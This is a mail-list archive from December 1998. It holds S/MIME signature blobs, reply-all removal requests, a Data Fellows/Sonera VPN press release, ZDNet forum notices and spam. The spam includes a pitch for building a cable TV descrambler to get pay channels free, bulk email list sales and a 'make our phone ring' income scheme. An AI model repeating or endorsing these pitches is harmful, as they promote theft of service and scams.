MYIB0DCCAcwCAQEwdjBiMREwDwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMO
VmVyaVNpZ24sIEluYy4xNDAyBgNVBAsTK1ZlcmlTaWduIENsYXNzIDEgQ0Eg
LSBJbmRpdmlkdWFsIFN1YnNjcmliZXICEAnBxChHFXu5Gq1YD9qV4U8wCQYF
Kw4DAhoFAKCBsTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw05ODEyMDExNjE5MDlaMCMGCSqGSIb3DQEJBDEWBBTrtBfCUbNA
lhr+eMNkWqyT+6rePDBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4G
CCqGSIb3DQMCAgIAgDAHBgUrDgMCBzANBggqhkiG9w0DAgIBQDANBggqhkiG
9w0DAgIBKDANBgkqhkiG9w0BAQEFAASBgIlYgn4HB/8DG23wFIQaEZBHgRvg
pAUqr5SH9BmYFec8hL+hZNGeMdVBlrcXOOKnIwQMcMI3ZC7DYP4P6wfFxyGE
IHqMP05OduRVUcc8/GfivfizJq32DjjlzLfBb0KkKch5L8EeuTBC7huexPWD
LD9lQdBlzL8POSEOee2zas2y
--Boundary..3999.1071713824.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "dan_verton"@fcw.com
Date: Tue, 1 Dec 1998 08:42:16 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE	 SECURE VPN S...
Message-ID: <852566CD.005B872C.00@zeus.fcw.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3999.1071713824.multipart/mixed"
Content-Length: 4980
Lines: 127

--Boundary..3999.1071713824.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

please remove my name from the cc address when you send this... I'm on this
thing as well




eschuman@cmp.com on 12/01/98 11:21:21 AM

Please respond to press-english-technical@lists.datafellows.com

To:   press-english-technical@lists.datafellows.com
cc:    (bcc: Dan Verton/FCW)
Subject:  Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE
       SECURE VPN S...




Same request. May I be removed from this list as well?




falcon falcon <falconinc@earthlink.net> on 12/01/98 11:20:14 AM

Please respond to press-english-technical@lists.datafellows.com

To:   press-english-technical@lists.datafellows.com
cc:
bcc:  Evan Schuman/MHS/CMPNotes
Subject:  Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE
      SECURE VPN S...




Please remove my name from your email list.


Opencity@aol.com wrote:

> Hi Mimmi
>
> Okay...this can be distributed as of today?
>
> Thanks
> phil






--Boundary..3999.1071713824.multipart/mixed
Content-Type: application/octet-stream; name="bin00006.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00006.bin"
Content-Description: "smime.p7s"

MIIKmgYJKoZIhvcNAQcCoIIKizCCCocCAQExCzAJBgUrDgMCGgUAMAsGCSqG
SIb3DQEHAaCCCJIwggPcMIIDRaADAgECAhAJwcQoRxV7uRqtWA/aleFPMA0G
CSqGSIb3DQEBBAUAMGIxETAPBgNVBAcTCEludGVybmV0MRcwFQYDVQQKEw5W
ZXJpU2lnbiwgSW5jLjE0MDIGA1UECxMrVmVyaVNpZ24gQ2xhc3MgMSBDQSAt
IEluZGl2aWR1YWwgU3Vic2NyaWJlcjAeFw05ODAzMDkwMDAwMDBaFw05OTAz
MDkyMzU5NTlaMIIBHzERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZl
cmlTaWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0g
SW5kaXZpZHVhbCBTdWJzY3JpYmVyMUYwRAYDVQQLEz13d3cudmVyaXNpZ24u
Y29tL3JlcG9zaXRvcnkvQ1BTIEluY29ycC4gYnkgUmVmLixMSUFCLkxURChj
KTk2MTMwMQYDVQQLEypEaWdpdGFsIElEIENsYXNzIDEgLSBOZXRzY2FwZSBG
dWxsIFNlcnZpY2UxFjAUBgNVBAMTDURhdmlkIFdhbGxhY2UxJjAkBgkqhkiG
9w0BCQEWF2ZhbGNvbmluY0BlYXJ0aGxpbmsubmV0MIGfMA0GCSqGSIb3DQEB
AQUAA4GNADCBiQKBgQDHI8H39EsMGyPI723JFjbKbLv2oGvzS8w9MjLQFKcp
P7CtfGeBKePW5X4kwAl8HgEnMuQ1Bmjf3qBk6bV4UE25akDg1H6Cxchr8Qqd
D8LWN0tTKZYoDWVP9upJRLqu29g1Z7ghMU/0DmPvXNNXELTFcIabeW7I7wjN
gQkiDUwFZwIDAQABo4HTMIHQMAkGA1UdEwQCMAAwga8GA1UdIASBpzCAMIAG
C2CGSAGG+EUBBwEBMIAwKAYIKwYBBQUHAgEWHGh0dHBzOi8vd3d3LnZlcmlz
aWduLmNvbS9DUFMwYgYIKwYBBQUHAgIwVjAVFg5WZXJpU2lnbiwgSW5jLjAD
AgEBGj1WZXJpU2lnbidzIENQUyBpbmNvcnAuIGJ5IHJlZmVyZW5jZSBsaWFi
LiBsdGQuIChjKTk3IFZlcmlTaWduAAAAAAAAMBEGCWCGSAGG+EIBAQQEAwIH
gDANBgkqhkiG9w0BAQQFAAOBgQA0UNlACbtKUQl/LE/fTo5i7EoDmNWId/za
tBau0Qbwe1RYE/d/0QPSHx8vaQb8wDSQeidR89jpUj9zco4CqLS6kDvmPAq5
GM8ifaxHvxWCsSzZH379kVNMl7nCEhIZS3KwRY7ZF0ZBnBNsha+gv1t66PiV
dXPIIGbVEnlz//yIHTCCAnkwggHioAMCAQICEFIfNR3ycH4AK77KWYcE1Tkw
DQYJKoZIhvcNAQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENl
cnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTk2MDYyNzAwMDAwMFoXDTk5MDYy
NzIzNTk1OVowYjERMA8GA1UEBxMISW50ZXJuZXQxFzAVBgNVBAoTDlZlcmlT
aWduLCBJbmMuMTQwMgYDVQQLEytWZXJpU2lnbiBDbGFzcyAxIENBIC0gSW5k
aXZpZHVhbCBTdWJzY3JpYmVyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC2FKbPTdAFDdjKI9BvqrQpkmOOLPhvltcunXZLEbE2jVfJw/0cxrr+Hgi6
M8qV6r7jW80GqLd5HUQq7XPysVKDaBBwZJHXPmv5912dFEObbpdFmIFH0S3L
3bty10w/cariQPJUObwW7s987LrbP2wqsxaxhhKdrpM01bjV0Pc+qQIDAQAB
ozMwMTAPBgNVHRMECDAGAQH/AgEBMAsGA1UdDwQEAwIBBjARBglghkgBhvhC
AQEEBAMCAQYwDQYJKoZIhvcNAQECBQADgYEAwfr3AudXyhF1xpwM+it3T4dF
Fzvj0sHaD1g5jq6VmQOhqKE4/nmakxcLl4Y5x8poNGa7x4hF9sgMBe6+lyXv
4NRu5H+ddlzOfboUoq4Ln/tnW0ilZyWvGWSI9nLYKSeqNxJqsSivJ4MYZWyN
7UCeTcR4qIbs6SxQv6b5DduwpkowggIxMIIBmgIFAqQAAAEwDQYJKoZIhvcN
AQECBQAwXzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMu
MTcwNQYDVQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRp
b24gQXV0aG9yaXR5MB4XDTk2MDEyOTAwMDAwMFoXDTk5MTIzMTIzNTk1OVow
XzELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDlZlcmlTaWduLCBJbmMuMTcwNQYD
VQQLEy5DbGFzcyAxIFB1YmxpYyBQcmltYXJ5IENlcnRpZmljYXRpb24gQXV0
aG9yaXR5MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDlGb9to1ZhLZlI
cfZn3rmN67eehoAKkQ76OCWvRoiC5XOooJskXQ0fzGVuDLDQVoQYh5oGmxCh
c9+0WDlrbsH2FdWoqD+qEgaNMax/sDTXjzRniAnNFBHiTkVWaR94AoDa3EeR
Kbs2yWNcxeDXLYd7obcysHswuiovMaruo2fa2wIDAQABMA0GCSqGSIb3DQEB
AgUAA4GBAFJzuppV3Nw/gn2wkJhiKoJMdgBuJT3VwglwVwEMD3cfGKH7HGAO
oHU7SSFB/qdcLUxCSdP/KNiM6p3+yQfid4JTI95V885Ek/r6TL3KNvNbZrKe
yPIMXl7UobQhCTPKO1n8ksI4/K3ZliTgLfqjKfUzaHhOtLyfaTXiqJiUczvE
MYIB0DCCAcwCAQEwdjBiMREwDwYDVQQHEwhJbnRlcm5ldDEXMBUGA1UEChMO
VmVyaVNpZ24sIEluYy4xNDAyBgNVBAsTK1ZlcmlTaWduIENsYXNzIDEgQ0Eg
LSBJbmRpdmlkdWFsIFN1YnNjcmliZXICEAnBxChHFXu5Gq1YD9qV4U8wCQYF
Kw4DAhoFAKCBsTAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3
DQEJBTEPFw05ODEyMDExNjIwMTZaMCMGCSqGSIb3DQEJBDEWBBTqA59FKAVu
APp3cQRcropf9EGzwzBSBgkqhkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4G
CCqGSIb3DQMCAgIAgDAHBgUrDgMCBzANBggqhkiG9w0DAgIBQDANBggqhkiG
9w0DAgIBKDANBgkqhkiG9w0BAQEFAASBgLsANR5X3iftXFzYLHzZdbQYq5gQ
NFYxVarzqr9LgYgQzTKBTMH9oYxfjlLrpgKvsr3Bu2kTg8xCcUMWguNfQRO5
8jkyxZiQUxAlJIibMuUbi8YVBg67uhGmWtV3ZKRdHpnBthUDLK7VhE1g0eO6
YjDx27D1yhlzgs7mX9kfpVS1
--Boundary..3999.1071713824.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Denny <mad@mm-croy.mottmac.com>
Date: Tue, 1 Dec 1998 08:31:25 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: RE: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATESECURE VPN S...
In-Reply-To: <852566CD%.0059DBF4.00@smtp-gate.mottmac.com>
Message-ID: <00444336010C01A0@smtp-gate.mottmac.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 853
Lines: 42


===== Original Message from PRESS-EN @ INTERNET 
{press-english-technical@lists.datafellows.com} at 1/12/98 16:21
>Same request. May I be removed from this list as well?
>
>
>
>
>falcon falcon <falconinc@earthlink.net> on 12/01/98 11:20:14 AM
>
>Please respond to press-english-technical@lists.datafellows.com
>
>To:   press-english-technical@lists.datafellows.com
>cc:
>bcc:  Evan Schuman/MHS/CMPNotes
>Subject:  Re: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE
>      SECURE VPN S...
>
>
>
>
>Please remove my name from your email list.
>
>
>Opencity@aol.com wrote:
>
>> Hi Mimmi
>>
>> Okay...this can be distributed as of today?
>>
>> Thanks
>> phil
===== Comments by MAD@MM-CROY (Mark Denny) at 1/12/98 16:27
Could you please stop sending me your emails. I think that some thing has 
gone wrong with your server.

Thanks.
Mark.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Denny <mad@mm-croy.mottmac.com>
Date: Tue, 1 Dec 1998 08:52:04 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: RE: bonjour
In-Reply-To: <852566CD%.005B6DC4.00@smtp-gate.mottmac.com>
Message-ID: <04444336010C01A0@smtp-gate.mottmac.com>
MIME-Version: 1.0
Content-Type: text/plain


===== Original Message from PRESS-EN @ INTERNET 
{press-english-technical@lists.datafellows.com} at 1/12/98 16:38
>this is not my list and I want off as well.
>
>
>
>
>falcon falcon <falconinc@earthlink.net> on 12/01/98 11:19:07 AM
>
>Please respond to press-english-technical@lists.datafellows.com
>
>To:   press-english-technical@lists.datafellows.com
>cc:    (bcc: Dan Verton/FCW)
>Subject:  Re: bonjour
>
>
>
>
>please remove my name from your email list.
>
>Thierry Roch wrote:
>
>> Ici tout va bien, merci.
>>
>> On esp
>re qu'une version fiable pour windows sortira un jour
>> Salut
>> ________________________________________
>> roch@liberation.fr
>> Tel : +33 (0) 1 42 76 17 68 - Fax: +33 (0) 1 42 76 02 24
>> Informatique Libration http://www.liberation.fr
===== Comments by MAD@MM-CROY (Mark Denny) at 1/12/98 16:43
Please remove me.

Mark.


Mott MacDonald Limited,
Registered in England No. 1243967
Registered office St. Anne House, 
20-26 Wellesley road, Croydon CR9 2UL
Tel: +44 (0) 181-774 2000 
Fax: +44 (0) 181-681 5706
Email Mad@mm-croy.mottmac.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thierry Roch" <roch@liberation.fr>
Date: Tue, 1 Dec 1998 08:06:30 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: bonjour
Message-ID: <v04102f00b289c49f3cff@[193.57.162.39]>
MIME-Version: 1.0
Content-Type: text/plain



Ici tout va bien, merci.

On espre qu'une version fiable pour windows sortira un jour
Salut
________________________________________
roch@liberation.fr
Tel : +33 (0) 1 42 76 17 68 - Fax: +33 (0) 1 42 76 02 24
Informatique Libration http://www.liberation.fr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marita Nsman-Repo <Marita.Nasman-Repo@DataFellows.com>
Date: Tue, 1 Dec 1998 07:44:26 -0800 (PST)
To: df-pr-us@DataFellows.com
Subject: MEDIA RELEASE: DATA FELLOWS AND SONERA JOIN FORCES TO CREATE SECURE VPN SERVICES FOR THE NEXT MILLENIUM
Message-ID: <3.0.32.19981201174413.00910940@smtp.datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 3123
Lines: 77


Press Release					                For immediate release


DATA FELLOWS AND SONERA JOIN FORCES TO CREATE SECURE VPN SERVICES FOR THE
NEXT MILLENIUM

Espoo, Finland, December 1, 1998 -- Data Fellows, the leading global
security solutions vendor, and Sonera, the leading Finnish
telecommunications service provider, have announced a partnership to create
next-generation Intranet and extranet services.

The scope of the partnership is to develop a secure IP service platform by
combining Sonera's leading-edge telecommunications services with Data
Fellows' award-winning secure VPN and anti-virus products.

"Security is not a simple issue. We see leading telecommunications service
providers in a key position to help corporate customers reap the benefits
of the Internet without the inherent risks," says Risto Siilasmaa, CEO of
Data Fellows. "Over the years, Sonera has always paved the way with
innovative telecommunications services. Well-managed strong security is the
logical next step."

"Our key challenges are the increasing demand for mobility and the
increasing use of extranets between companies," says Jukka T Leinonen,
Managing Director of Sonera Solutions. "Managed IP-based virtual private
networks with a functioning Public Key Infrastructure (PKI) and strong
security constitute the foundation for future corporate information
systems. Data Fellows can provide us with standards-based, proven security
with globally available strong encryption." The first products and services
will be announced early next year.  
  
Data Fellows' groundbreaking F-Secure products provide a unique combination
of globally available strong encryption, revolutionary anti-virus software
and policy based management. Data Fellows products are relied on by the
world's largest industrial corporations, best-known telecommunications
companies and major airlines, several European governments, post offices
and defence forces as well as several of the world's largest banks. Data
Fellows was selected one of the Top 100 Technology companies in the world
by Red Herring magazine in September 1998.

Sonera Ltd is Finland's leading telecommunications company, with
subsidiaries and associated companies in 14 countries. Internationally,
Sonera is a forerunner in the rapidly growing field of mobile, data, and
media communications. In 1997, Sonera's net sales amounted to FIM 8
billion, and operating profit was FIM 1.7 billion. The Group employs 8,200
people.

For more information, please contact

USA:
Data Fellows Inc.   
Mr. Pirkka Palomaki, Product Manager
Tel. +1 408 938 6700, fax  +1 408 938 6701
E-mail:  Pirkka.Palomaki@DataFellows.com

Europe:
Data Fellows Oy
Mr. Jukka Kotovirta, Director, Service Provider Business Unit
PL 24     
FIN-02231 ESPOO 
Tel.  +358 9 859 900, fax. +358 9 8599 0599
E-mail: Jukka.Kotovirta@DataFellows.com
or visit our web site at http://www.DataFellows.com

Sonera Solutions Ltd.
Mr. Timo Korpela, Head of Product Development
Tel. +358 2040 63296, fax. +358 2040 64652
E-mail: Timo.Korpela@sonera.net

--
Marita.Nasman-Repo@DataFellows.com, 
World-Wide Web http://www.DataFellows.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "kryz" <chrisharwig@hetnet.nl>
Date: Tue, 1 Dec 1998 09:16:33 -0800 (PST)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Fw: 1998-11-30 Memorandum to Department Heads on Electronic Commerce
In-Reply-To: <19981130204732.0.MAIL-SERVER@pub1.pub.whitehouse.gov>
Message-ID: <MAPI.Id.0016.0072797a202020203030303430303034@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 1378
Lines: 41




----------
| Date: maandag 30 november 1998 19:47:00
| From: The White House
| To: Public-Distribution@pub.pub.whitehouse.gov
| Subject: 1998-11-30 Memorandum to Department Heads on Electronic Commerce
|
|
|                             THE WHITE HOUSE
|
|                      Office of the Press Secretary
| ________________________________________________________________________
| For Immediate Release                                  November 30, 1998
|
|
|
|                             November 30, 1998
|
|
|
| MEMORANDUM FOR THE HEADS OF EXECUTIVE DEPARTMENTS AND AGENCIES
|
| SUBJECT:  Successes and Further Work on Electronic Commerce
|
|
|     The Internet and electronic commerce have the potential to
| transform the world economy.  The United States Government is committed
| to a market-driven policy architecture that will allow the new digital 
| economy to flourish while at the same time protecting citizens' rights 
| and freedoms.
|
|     Today my Administration has released a report that details the
| significant progress made on the implementation of my Directive on
| Electronic Commerce of July 1, 1997, and its accompanying policy
| statement, "A Framework for Global Electronic Commerce."  The electronic
| commerce working group that has coordinated the United States
| Government's electronic commerce strategy has accomplished a great deal



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bill" <4u00@321media.com>
Date: Tue, 1 Dec 1998 19:54:16 -0800 (PST)
To: club333@sgu-ns1.sg-u.ac.jp
Subject: Process Serving Court Filing Searches
Message-ID: <199812020356.MAA13831@sgu-ns1.sg-u.ac.jp>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 246
Lines: 14



http://www.select-document.com

///////////////////////////////////////////////////
To be removed from future mailings, please send an
email to mailto:4lemy@lycosmail.com?subject=remove
///////////////////////////////////////////////////







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cabgirly333@hotmail.com
Date: Tue, 1 Dec 1998 21:12:50 -0800 (PST)
To: cabgirly334@hotmail.com
Subject: Build Your Own Cable TV Descrambler for less than $9.99.
Message-ID: <9812020512.AB02555@chrivb01.cch.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 4995
Lines: 117



            Cable Television Descrambler - Easy To Make !
       Build your own Cable Television Descrambler with ONLY 7 parts 
                         from Radio Shack for UNDER $10.00.

         (don't hit reply, please check bottom of message for more references)
---------------------
(Last minute update: "I've seen my letter and instructions sent by individuals that besides violating copy-right laws, are neither responding to the customer nor providing the original, complete set of plans and instructions. Please be advised you are risking your money and patience by ordering from individuals who know nothing regarding this tech/electrical matter" --Raul Mendez)

Build your own Cable Television Descrambler with ONLY 7 parts 
from Radio Shack for UNDER $10.00.

REQUIRED SUPPLIES:
==================
1 - Radio Shack mini-box (part #270-235)
1 - < watt resistor. 2.2k-2.4k ohm (part #271-1325)
1 - 75pf-100pf variable capacitor (special order)
2 - F61A chassis-type connectors (part #278-212)
12" - No. 12 solid copper wire
12" - RG59 coaxial cable


Tools required:  screwdriver & drill.  Soldering gun & solder (optional).

Get ALL the Premium Movie Channels, Pay per View and Adult Entertainment 
Channels for... FREE, FREE, FREE !!!

Now, if I have your attention... let me tell you how this fantastic 
opportunity came about.

My name is Raul.  I live in New York City, New York.  I have season 
tickets to our citys hockey team.  I invited a friend of mine to one 
of the games this last October.  

He said, "Id love to go if you can have me back home by 10:00 p.m."  I
told him that some games run just past 10:00 p.m. and would he mind we 
stay if the game was close. 

His response was, "No, tonight is the Mike Tyson - Evander Holyfield 
boxing match and I have it on pay per view"  I said, "do you mind if I
watch the fight with you"?  He said, "sure, no problem".  So we go watch
this great fight on cable pay per view and we are the only two guys at 
my friends house.

After the fight (since it was so good) I offered to pay half of the cost
for the fight.  My friends answer was, "no, no, thats not necessary... 
I got the fight for FREE!".  I said to him, "for free, dont those fights
cost around $40.00 a pop?"  He told me, "yes, they do, but I bought a 
cable descrambler box from an acquaintance of mine for $300.00".

He further explained that this "little black box" gets ALL the pay per 
view events available!  It also tunes in ALL the premium movie channels
and ALL the adult entertainment channels.

My response (without hesitation) was, "I gotta have one!"  "$300.00, no
problem where do I pay !!!"  Im serious, I was excited.  Lifetime 
premium movie channels, pay per view and adult entertainment all for a 
one-time fee of $300.00... no way!!!

"No way" was right.  The guy that sold my buddy the box was no where to 
be found. I was really disappointed.  It was now time for desperate 
measures.  I begged and pleaded with my friend until he agreed to let me
take his box apart piece by piece to see how to make one for myself.  

Luckily it was very easy, if it wasnt simple I knew their was a slight
chance it was not going back together so pretty.

Now the rest is history... Ive got my own box which I built with my own
two hands.

Would you like to build one yourself ?!?!  

If so, would you pay $300.00.  Maybe so, maybe not.  Probably not, unless
you saw one work first.  But since that is not possible, I will sell you
a complete set of instructions on how to build one yourself for a measly
$9.99.  However, at that price YOU MUST ALSO ENCLOSE A #10 SELF ADDRESSED STAMPED ENVELOPE WITH 55 CENTS POSTAGE AFFIXED.

You might ask, is this some type of rip-off scam deal.  The answer is NO!
Everything has specific mechanics of how and why they do what they do.  

We are just used to flipping a switch or pushing a button or moving the
mouse across our computer pads.  It all happens because of a certain set 
of processes.  The cable television descrambler is no different.

However, for legal purposes I must add to this letter that this offer and
set of instructions shall be void where prohibited by law and the 
assembling of parts necessary to make this "little jewel" work is for 
educational purposes only. 

To order a set of the instructions send $9.99 by cash, check or money 
order payable to: Raul Mendez Enterprises,  50 Lexington Av suite 209, New York city, NY 10010

I will mail your order out within 24 hours of receiving it.  Further, I 
will give you a refund upon written request if you are unsatisfied for 
any reason.

Happy Holidays !!!

Sincerely,

Raul Mendez


P.S.:  The  use of this mini-box if you choose to go on and see if your 
creation works requires no alteration of your existing cable system.
You simply screw it in, right behind your television.

P.P.S.:  Without the instructions its like figuring out how to set the
clock on your VCR.  With the instructions, you are guaranteed success.



 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "ZDNet Announce" <announce@zdnet.zdlists.com>
Date: Wed, 2 Dec 1998 20:30:49 -0800 (PST)
To: "ZDNet" <zdnet1@MAIL.ZDLISTS.COM>
Subject: Check out the New ZDNet and ZDTV Forums!
Message-ID: <199812030315.WAA22510@america.interstep.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 3044
Lines: 72


Dear Forum Member:

If you are reading this message, you are a participant in the ZDNet
or ZDTV message boards (a.k.a. ZDNet Forums or Community). I would
like to take this opportunity to tell you about some changes that
will affect you on December 8.

We are moving from our current forum software, called Podium, to
version 1.0 of new forum software created by Deja News. On Dec. 8,
when you follow a link or bookmark to one of our forums, you will be
directed to the new software automatically. You don't have to download
or install anything -- our forums remain entirely Web-based -- but the
apearance and functions of the forums will be different. All your
messages posted in Podium are being brought over, so your conversations
won't miss a beat.

We have been testing the Deja News software in three of our current
forums for several months, and we have also created a test forum so
you can try out the software and give us your feedback.  We know that
any change is disruptive; you will have to re-learn some forum
functions and get used to a new interface. We apologize in advance for
the hassle. We felt the switch to the Deja News software was the only
way to improve the  performance and reliability of the forums, plus
the new software has a better search engine and great possibilities
for integrating Usenet newsgroups into our offerings.

If you have not yet had a chance to try out the new software, you can
do so at any one or all of the forums listed below:

Test Forum
http://chkpt.zdnet.com/chkpt/zdn11202/f5.dejanews.com/frames/test.html

Help Channel General Discussion
http://chkpt.zdnet.com/chkpt/zdn11202/f5.dejanews.com/frames/generaldiscussion.html

Microsoft Office
http://chkpt.zdnet.com/chkpt/zdn11202/f5.dejanews.com/frames/msoffice.html

Gadget Gab
http://chkpt.zdnet.com/chkpt/zdn11202/f5.dejanews.com/frames/gadget.html


Please give us your feedback about the new software in the Test
Forum.  We are using your comments to make the software work better,
so we appreciate as much of participation as possible.

In addition to the new software, we will be merging several forums.
Over the months, ZDNet and ZDTV have created a number of overlapping
message boards, and some forums have lost their appeal to users. As
part of the switch to Deja News, we'll be integrating forums on
similar topics. As a result, expect most forums to be busier after Dec. 8.

Thank you for your time and effort.  We are looking forward to seeing
you in the new forums, and we are glad to have you as a part of the
ZDNet Community. We will send you just a few more e-mails like this
one to keep you up-to-date on the switch, but we promise not to
continue spamming you after the transition is complete.

Regards,

Wendy Frankwich
ZDNet and ZDTV Community
http://chkpt.zdnet.com/chkpt/zdn11202/www.zdnet.com
http://chkpt.zdnet.com/chkpt/zdn11202/www.zdtv.com

_______________________________________________________________________
To be removed from this list, simply reply to this message with
"unsubscribe" as your subject.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jt9@mail.dsd.it
Date: Thu, 3 Dec 1998 21:48:41 -0800 (PST)
To: user@the.internet
Subject: Hi
Message-ID: <199812040530.GAA19346@www.dsd.it>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 923
Lines: 22


Do you know what the number one factor is, that will determine whether your business is a
success or not?  ADVERTISING!  Effective conventional advertising is quite expensive.  So
what do you do?  Direct email is one of, if not thee most effective method of advertising in 
the 90's.  You can get your ad out to hundreds of thousands, even millions, for only a fraction of 
the cost of traditional advertising.  The wave of future advertising is here, don't miss it.  We
will send your advert for you.  We have gone through painstaking methods to insure that we
have the the most quality lists on the Internet.  We send your ad for your, all you have to do
is create it.


250,000 addresses - $199
350,000 addresses - $250
500,000 addresses - $350
1 million addresses - $700

For advertising to 3 million or more ask about our special rates.

For more information or to place an ad call IMC Marketing at (909) 627-3557




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 5dfs@mail.gnosis.it
Date: Fri, 4 Dec 1998 02:06:24 -0800 (PST)
To: user@the.internet
Subject: ADV: We'll Pay You To Make Our Phone Ring
Message-ID: <199812040937.KAA24534@mail.gnosis.it>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 2427
Lines: 49


Dear Business Friend,
You are receiving this offer because we have corresponded in the past, or
because you have been referred to me as someone interested in business
opportunities. If this message has reached you in error, please accept my
apologies. To remove your address from future mailings, please reply with
"remove" in the subject heading.
********************************
ALL YOU DO IS ADVERTISE OUR 800 NUMBER - THAT'S ALL !
* You get $100 for EVERY SALE plus ENDLESS RESIDUALS!
* Just MAKE OUR PHONE RING !
* Easiest, most profitable business around
* You can earn thousands of $$ your very first month !
* No selling required - our expert sales team closes sales for you
* We send out huge checks weekly
* No meetings, phone calls, no hassles
* Advertise any way you want - email, flyers, classifieds, postcards, etc.
If you are an average person like myself who has always wanted
to generate a large easy income from home, but you don't want
the hassles of inventory, marketing plans, or direct selling,
then THIS IS FOR YOU. All you do is advertise our 800 number
and your ID number, and our trained staff do the rest for you.
Don't just take my word for it - listen to some amazing
testimonials from existing members:
1-888-446-6951 (He made $10,000 his first month)
1-888-446-6949 (He erased all his debt in one month)
1-888-715-0642 (She averages $1,000 every week)
1-888-703-5389 (He can't believe it's this easy)
You also have the peace of mind of offering one of the best
products available: a lifetime membership in a discount service
providing guaranteed low prices on over 250,000 products and
services. Hotel & Travel Services, Major Appliances, Dentists,
Legal Services, 7.5 cents/minute long-distance, Groceries...
YOU CAN START TODAY - CALL NOW:
1-800-811-2141 (ID # 66078) 8am - 10pm CST Mon-Sat
*****************
P.S. I am really excited about this and YOU souuld be too.  I called and
checekd this out it in not a two or 3 tier  pusiness oppertuniety it is one
level ONLY..you get payd for the people you bring in and have to do nothing
else. The savings in they buying end of it is really great too from there
catalog of 250,000 items is absolutely great also so I joined and hope you
do to if not for the business end but for what you going to save  buying
alone it is worth it...
     THANKS  FOR YOU TIME
       Michael T. Kacer reply to me with your # & e-mail and i will help u
if i can




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Teemu Hukkanen <hukkte@datafellows.com>
Date: Fri, 4 Dec 1998 11:05:13 -0800 (PST)
To: press-english-technical@lists.datafellows.com
Subject: Apology for mixup in press release mailing list
Message-ID: <19981204210202.A1828@datafellows.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 215
Lines: 10


Due to an unsuspected flaw, our mailing lists were slightly
misconfigured which allowed replies to the original press release
email to be forwarded to all recipients in the list.

--
 postmaster@datafellows.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "ZDNet Announce" <announce@zdnet.zdlists.com>
Date: Sat, 5 Dec 1998 20:30:18 -0800 (PST)
To: "ZDNet" <zdnet1@MAIL.ZDLISTS.COM>
Subject: ZDNet and ZDTV Forums Update
Message-ID: <199812060315.WAA24865@america.interstep.com>
MIME-Version: 1.0
Content-Type: text/plain
Content-Length: 4678
Lines: 102


++++++++++++++++++++++++++++++++++++++++++++++++++++++
This is the second message from ZD to all the members of our
message boards. It contains information and tips about a coming
 transition to new software. You will receive just one or two more
of these messages in the coming week.
++++++++++++++++++++++++++++++++++++++++++++++++++++++

When you go to the ZDNet or ZDTV forums on Tuesday,  Dec. 8, you
will find the new Deja News software in place. You will see some
differences in the way the message boards operate, so you may need
to  experiment a little.  If you are very familiar with our current
forum features, it will take some time to become comfortable with
the new system. We apologize for the inconvenience this causes and
are trying to make the switch as painless as possible. We'll have
dozens of sysops online answering your questions every day. We also
will update the on-line help files frequently to highlight key
differences between the current software, called Podium, and the
new version.

Below are some advance hints for everyone making the switch to Deja
News.  You can try these features out in now our Test Forum at
http://f5.dejanews.com/frames/test.html

** Messages that you have not yet read appear in bold. **
